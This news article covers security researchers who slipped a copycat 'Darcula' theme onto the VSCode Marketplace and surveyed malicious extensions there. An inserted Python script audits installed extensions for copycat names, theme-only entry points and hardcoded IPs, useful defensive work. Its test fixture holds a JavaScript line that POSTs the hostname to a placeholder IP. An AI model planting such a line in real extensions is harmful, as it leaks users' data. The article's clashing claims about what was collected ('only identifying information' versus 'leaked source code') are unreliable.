
Security Flaws in Microsoft VSCode Marketplace Impact over 100 Organizations

Researchers have discovered 1,283 known-malicious extensions, along with thousands more that communicate with hardcoded IP addresses, launch unknown executables, or impersonate popular extensions.


Israeli cybersecurity researchers have found concerning weaknesses in how the Visual Studio Code (VSCode) Marketplace vets extensions, revealing that over 100 organizations installed a trojanized extension. The researchers, Amit Assaraf, Itay Kruk, and Idan Dardikman, showed how a malicious extension can harvest sensitive system data without being detected.

The VSCode Marketplace is an online platform provided by Microsoft where users can discover, download, and install extensions to enhance the functionality of its popular source code editor, Visual Studio Code.

To demonstrate their findings, they crafted a misleading extension that impersonated the popular ‘Dracula Official’ theme, which has over 7 million installations. They named their version ‘Darcula’ and registered a look-alike domain to boost its credibility. The extension included a script that collected system details such as the hostname, the number of installed extensions, the domain name, and the operating system, and sent them to a remote server via HTTPS POST requests.

Evading Detection Mechanisms

Standard endpoint detection and response (EDR) tools did not flag the activity of the ‘Darcula’ extension. VSCode extensions run inside the editor's extension host process with the full privileges of the logged-in user and without a permission model, so reading files, executing commands, and spawning child processes are routine behaviour for a trusted developer tool and did not stand out. Notably, the extension was installed by targets including a publicly traded company with a $483 billion market cap, major security firms, and a national judicial network. The team kept the extension non-destructive: it collected only identifying information, and its behaviour was disclosed in the extension's documentation.

Using a tool named ‘ExtensionTotal,’ the researchers scrutinized the VSCode Marketplace. They discovered 1,283 known-malicious extensions, 8,161 communicating with hardcoded IPs, 1,452 launching unknown executables, and 2,304 copycat extensions. One particularly harmful extension was capable of opening a reverse shell to a cybercriminal’s server.
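The three traits described above, a "theme" that ships executable code, a name that is a near-copy of a popular extension under a different publisher, and hardcoded IP literals in the bundled JavaScript, can be checked locally against the extensions VSCode has installed. The following audit script is an added example written for this article; it is not the researchers' ExtensionTotal tool or any Microsoft code. It assumes the on-disk layout VSCode uses under `~/.vscode/extensions` (one `<publisher>.<name>-<version>` directory per extension, each with a `package.json`), a hypothetical watchlist of popular extension IDs, and a constructed pair of sample extensions built in a temporary directory so the script runs offline.

```python
"""
Heuristic audit of locally installed VS Code extensions (added example, not from the article).

Flags: (1) a theme-only extension that declares an entry point, (2) a name within edit
distance 2 of a popular extension published by someone else, (3) hardcoded public IPv4
literals in bundled JavaScript. The watchlist and the sample extensions are constructed.
"""
import json
import re
import tempfile
from pathlib import Path

# Assumed watchlist of widely installed extension IDs (publisher.name); extend as needed.
POPULAR_EXTENSION_IDS = {
    "dracula-theme.theme-dracula",
    "ms-python.python",
    "esbenp.prettier-vscode",
}
COSMETIC_CONTRIBUTIONS = {"themes", "iconThemes", "productIconThemes"}
IPV4_LITERAL = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
NON_ROUTABLE = re.compile(r"^(127\.|10\.|192\.168\.|0\.0\.0\.0$|172\.(1[6-9]|2\d|3[01])\.)")


def levenshtein(a: str, b: str) -> int:
    """Edit distance; swapping two letters ('dracula' -> 'darcula') costs 2."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def audit_extension(ext_dir: Path) -> list[str]:
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    publisher = manifest.get("publisher", "").lower()
    name = manifest.get("name", "").lower()
    ext_id = f"{publisher}.{name}"
    contributes = manifest.get("contributes", {})
    entry_point = manifest.get("main") or manifest.get("browser")
    findings = []

    # 1. A colour theme needs no code: an entry point means JavaScript runs on activation.
    if contributes and set(contributes) <= COSMETIC_CONTRIBUTIONS and entry_point:
        findings.append(f"{ext_id}: declares only themes but has an entry point ({entry_point})")

    # 2. Copycat check: near-identical name, different publisher.
    for popular in sorted(POPULAR_EXTENSION_IDS):
        pop_publisher, pop_name = popular.split(".", 1)
        if publisher != pop_publisher and levenshtein(name, pop_name) <= 2:
            findings.append(f"{ext_id}: name is within edit distance 2 of {popular}")

    # 3. Hardcoded public IPv4 literals (version strings like 1.2.3.4 can false-positive).
    for js in ext_dir.rglob("*.js"):
        if "node_modules" in js.parts:
            continue
        text = js.read_text(encoding="utf-8", errors="ignore")
        for ip in sorted(set(IPV4_LITERAL.findall(text))):
            if not NON_ROUTABLE.match(ip):
                findings.append(f"{ext_id}: hardcoded IP {ip} in {js.relative_to(ext_dir)}")
    return findings


def audit_extensions_root(root: Path) -> dict[str, list[str]]:
    """Audit every extension directory under root (e.g. ~/.vscode/extensions)."""
    return {
        p.name: audit_extension(p)
        for p in sorted(root.iterdir())
        if (p / "package.json").is_file()
    }


def build_constructed_fixture(root: Path) -> None:
    """Constructed sample data: a benign theme and a look-alike that phones home."""
    benign = root / "dracula-theme.theme-dracula-0.0.1"
    benign.mkdir(parents=True)
    (benign / "package.json").write_text(json.dumps({
        "name": "theme-dracula", "publisher": "dracula-theme",
        "contributes": {"themes": [{"label": "Dracula", "path": "./theme/dracula.json"}]},
    }))
    copycat = root / "example-copycat.theme-darcula-0.0.1"
    (copycat / "out").mkdir(parents=True)
    (copycat / "package.json").write_text(json.dumps({
        "name": "theme-darcula", "publisher": "example-copycat",
        "main": "./out/extension.js", "activationEvents": ["*"],
        "contributes": {"themes": [{"label": "Darcula", "path": "./theme/darcula.json"}]},
    }))
    # 203.0.113.10 is a documentation (TEST-NET-3) address, used here as a placeholder.
    (copycat / "out" / "extension.js").write_text(
        'const os=require("os");fetch("https://203.0.113.10/collect",'
        '{method:"POST",body:JSON.stringify({host:os.hostname()})});'
    )


def demo() -> dict[str, list[str]]:
    root = Path(tempfile.mkdtemp(prefix="vsix-audit-"))
    build_constructed_fixture(root)
    return audit_extensions_root(root)


if __name__ == "__main__":
    for ext, findings in demo().items():
        print(ext, "->", findings or "no findings")
```

Point `audit_extensions_root` at the real extensions directory to audit a workstation; the copycat sample produces all three findings, the genuine theme none. The edit-distance heuristic is deliberately loose (any two-character difference under a different publisher), so treat its hits as a review queue rather than a verdict.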

The team had their extension published on the Marketplace within just 30 minutes. It not only changed the IDE's appearance but also leaked source code to a remote server. It soon gained popularity, trending on the VSCode Marketplace, which receives 4.5 million monthly views. Within a day, over 100 victims had installed it, including devices at multi-billion dollar companies, top security firms, and a country's justice court network.

Reporting and Prevention

The researchers notified Microsoft of all identified malicious extensions for removal, though many remain accessible. They are set to release ‘ExtensionTotal’ as a free tool for developers to check for possible threats within their environments. Microsoft has not yet responded to inquiries about strengthening the security of the VSCode Marketplace.

Having identified numerous similar cases, the researchers committed to responsible disclosure, working with more than ten multi-billion dollar companies to reduce this security risk.

Last Updated on November 7, 2024 7:46 pm CET

Markus Kasanmascheff
Markus has been covering the tech industry for more than 15 years. He holds a Master's degree in International Economics and is the founder and managing editor of Winbuzzer.com.
